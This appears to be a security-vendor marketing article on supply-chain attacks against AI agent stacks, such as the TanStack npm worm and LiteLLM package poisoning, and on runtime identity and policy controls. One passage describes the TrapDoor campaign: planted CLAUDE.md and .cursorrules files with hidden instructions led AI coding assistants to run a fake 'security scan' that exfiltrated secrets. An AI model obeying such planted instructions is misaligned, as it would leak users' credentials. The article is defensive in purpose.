23,000 Vulns in 1,000 OSS Projects.
Your AI Supply Chain Is Already Compromised. Here's What Runtime Identity Changes.

Claude Mythos Preview is not a specialized vulnerability scanner. It is a general-purpose frontier model that Anthropic has concluded has reached a level of coding capability where it can surpass all but the most skilled human security researchers at finding and exploiting software vulnerabilities — often entirely autonomously.

Under Project Glasswing, Anthropic gave controlled access to Mythos to approximately 50 organizations to scan their own and third-party OSS code. The results were extraordinary in scale: Mozilla found 271 Firefox vulnerabilities using Mythos. Palo Alto Networks identified dozens of flaws in their own codebase. Even widely audited projects like curl received findings — though in curl's case, only one low-severity vulnerability was detected, a testament to how deeply curl's maintainers already invest in security.

Anthropic has noted that the surge in AI-powered vulnerability discovery is adding pressure to an already-overloaded security ecosystem. With 1,100+ unverified findings reported to vendors and only 75 critical/high issues patched so far — and 65 security advisories published — the patch queue is growing faster than the remediation rate. Your OSS dependencies have a non-trivial probability of containing unpatched, AI-discovered vulnerabilities right now, and the timeline for exploitation is compressing as the same model capabilities become available to adversaries.

Traditional software supply chain risk is passive: you ship an application with a dependency, and if the dependency is vulnerable, an attacker can exploit it. AI agents make the risk dynamic and recursive. A production AI agent using LangChain or LangGraph autonomously executes tool calls against npm packages, Python libraries, and MCP servers at runtime. It doesn't just ship with dependencies — it actively pulls and chains them mid-execution, often with no human in the loop.

The LangDrained research (Cyera, 2026) found three distinct vulnerability classes in LangChain/LangGraph — one critical (CVE-2025-68664, "LangGrinch") and two high-severity — exposing filesystem files, environment secrets, and conversation history to any attacker who can influence agent inputs. LangChain has 847 million total downloads. Every enterprise using it as their AI agent framework is running vulnerable package execution without a runtime governance layer that can constrain what those packages are allowed to do.

The attack surface is compounded by MCP servers: Trend Micro found 1,467 MCP servers exposed to the internet with zero authentication by April 2026, and an unsafe defaults vulnerability across LiteLLM, LangChain, and LangFlow MCP implementations triggered remote command execution in 10 separate packages. When an AI agent calls an MCP tool, it is executing a package invocation with no runtime identity check.

• No SBOM coverage for agentic instructions: A poisoned skill definition does not trigger a CVE and never appears in a software bill of materials. No mainstream security scanner has a detection category for malicious instructions embedded in agent skill definitions — the exact vector the TrapDoor campaign exploited with poisoned CLAUDE.md files.
• SLSA attestation is breakable by build identity compromise: The TanStack worm produced validly-attested SLSA Build Level 3 provenance for malicious packages — the first documented case of an npm worm doing so. Every automated supply chain check passed.
• Autonomous execution with no per-call scoping: Most AI agent frameworks grant tool access at framework initialization, not per-call. A compromised dependency package inherits the full tool scope of the agent — there is no least-privilege boundary at the package level without an external governance layer.

On May 11, 2026 between 19:20 and 19:26 UTC, the threat group TeamPCP published 84 malicious versions across 42 @tanstack/* npm packages. The attack vector: a fork-based "Pwn Request" that triggered a pull_request_target workflow, combined with GitHub Actions cache poisoning. Attacker-controlled binaries extracted an OIDC token from the GitHub Actions runner's process memory, then used it to publish malicious npm packages signed with TanStack's legitimate identity.

Within hours, the worm propagated to Mistral AI, UiPath, Guardrails AI, and dozens of other maintainers. @tanstack/react-router alone receives over 12.7 million weekly downloads. The malicious versions carried legitimate Sigstore attestations — correctly attesting that packages were built and published by the official release workflow. Every automated supply chain check passed. This is the new threat model: the attack doesn't compromise the package contents in a way that scanners detect. It compromises the build identity used to sign the package — so every downstream SLSA and Sigstore verification returns green while malicious code runs.

The TrapDoor campaign, attributed to the GitHub account ddjidd564, began May 22, 2026. It spread credential-stealing malware across 34 packages — 21 npm, 7 PyPI, 6 Crates.io — masquerading as developer utilities and build helpers. Targeted data: SSH keys, AWS credentials, GitHub tokens, browser login databases, environment variables, and API keys.

What distinguishes TrapDoor is its AI-specific attack vector: the campaign opened pull requests against LangChain, browser-use, and LangFlow with malicious .cursorrules and CLAUDE.md files containing hidden instructions designed to trick AI coding assistants into running a "security scan" that would actually execute secret discovery and exfiltration. An AI agent that reads its own context files — standard behavior for all major AI coding tools — becomes the exfiltration vector. The attacker's infrastructure described the operation as a "Universal AI Agent Extraction Framework."

In March 2026, a poisoned Trivy security scanner in the LiteLLM CI/CD pipeline exfiltrated the project's PyPI publish token. The attacker used it to publish malicious LiteLLM 1.82.7 and 1.82.8 — harvesting SSH keys, GCP/AWS/Azure credentials, kubeconfigs, and database passwords from every developer who installed the package. LiteLLM is the most widely used multi-provider LLM routing library in enterprise AI stacks.

That same month, UNC6426 exploited the nx npm supply chain attack to gain AWS Admin access within 72 hours — demonstrating that the time from a compromised package to full cloud infrastructure access is now measured in hours, not days. Every AI agent that installs unverified packages from infected registries is a potential credential exfiltration pathway into cloud infrastructure.

KYA provides cryptographic workload identity for every AI agent running in your environment. Before any agent can invoke a tool, call an MCP server, or access enterprise data, it must present a verified identity with a declared scope. Unknown agents — including agents that have been compromised by a malicious dependency package and are attempting to escalate scope — receive no access, not just a warning.

This is the containment layer that supply chain attacks cannot bypass: even if a malicious npm package executes inside an agent's dependency tree, it cannot invoke enterprise tools without the agent's declared identity and scoped permissions. The compromised package runs — but it cannot reach your enterprise data, APIs, or infrastructure without clearing the KYA identity gate.

RuntimeAI's AI Integration Fabric sits between AI agents and every enterprise tool they invoke. No agent — and no package executing inside an agent — can call a tool, API, database, or MCP server directly. Every invocation passes through the Integration Fabric, where policy enforces what the agent is allowed to call, with what parameters, and with what scope.

This means that when a compromised LangChain dependency attempts to call a filesystem tool, an AWS API, or an outbound webhook, the Integration Fabric evaluates the call against the agent's declared policy. An invocation that falls outside the agent's declared tool scope — which is exactly what a supply chain exploit would produce — is blocked before it executes. The invocation is logged in the Audit Black Box regardless of outcome.

Every tool call, MCP server invocation, and package execution event is recorded in the Audit Black Box — an immutable, tamper-proof audit trail that survives log destruction, agent termination, and infrastructure compromise. When a TanStack-style worm runs inside an AI agent, the Audit Black Box records every downstream action: what tools were called, what parameters were passed, what data was accessed, and what network egress was attempted.

For forensic response: when Mythos or an attacker discovers a vulnerability in a package your agent depends on, you can determine the blast radius — which agents ran the vulnerable package, what they did, and what data they touched. For compliance: regulators increasingly require demonstrable evidence that AI systems operated within declared boundaries. The Audit Black Box generates that evidence automatically, per-invocation, with no manual instrumentation.

RuntimeAI's Policy Engine (built on Rego/OPA) allows security teams to declare exactly which tools each agent is allowed to call, which packages are allowed to execute within each agent's context, and what network destinations are reachable. This is policy-as-code applied to the AI supply chain: instead of scanning packages and hoping the scanner catches every vulnerability, you enforce a behavioral boundary around what the agent — and its entire dependency tree — is allowed to do.

When Claude Mythos finds 23,000 vulnerabilities in OSS packages — or when an attacker exploits one before a patch ships — the Policy Engine limits the blast radius to what the agent's policy allows. A vulnerable deserialization flaw in LangChain Core (CVE-2025-68664 "LangGrinch") cannot be exploited to read filesystem files if the agent's policy doesn't permit filesystem tool calls. Zero-day supply chain vulnerabilities become contained exploits, not enterprise breaches.